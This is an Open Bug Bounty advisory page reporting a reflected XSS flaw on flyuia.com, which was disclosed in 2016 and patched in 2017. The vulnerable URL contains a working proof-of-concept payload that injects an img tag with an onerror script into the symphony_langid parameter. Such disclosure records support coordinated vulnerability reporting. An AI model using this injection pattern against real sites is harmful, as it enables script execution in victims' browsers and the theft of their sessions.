flyuia.com XSS vulnerability

2016-09-26T01:48:00
ID OBB:183591
Type openbugbounty
Reporter WhitePacket
Modified 2017-07-28T11:30:00

Description

Vulnerable URL:
http://www.flyuia.com/amadeus/symphony.php?arr_1=1&arr_0=1&infcount=1&symphony_langid=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt(%27XSSPOSED%27)%3E&journey_type=oj&wcag_on=0&airlines=ps&dep_1=1&dep_0=1&ycdcount=0&pricer_pref=frp&id_location=ua&adtcount=1&date_1=1&date_0=1&langid=uk&chdcount=1&ythcount=0&next=1&s2_web_id=symphony&cabin_pref=1

Details:

Description| Value
---|---
Patched:| Yes, on 28.07.2017
Latest check for patch:| 28.07.2017 11:30 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 22466
VIP website status:| Yes
Check flyuia.com SSL connection:| (Grade: A)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 26 September, 2016 01:48 GMT
Generic security notifications sent to website owner| 26 September, 2016 01:51 GMT
Notification sent to subscribers (without technical details)| 26 September, 2016 02:17 GMT
Vulnerability details disclosed by researcher| 3 October, 2016 02:12 GMT
Vulnerability patched by the website owner| 28 July, 2017 11:30 GMT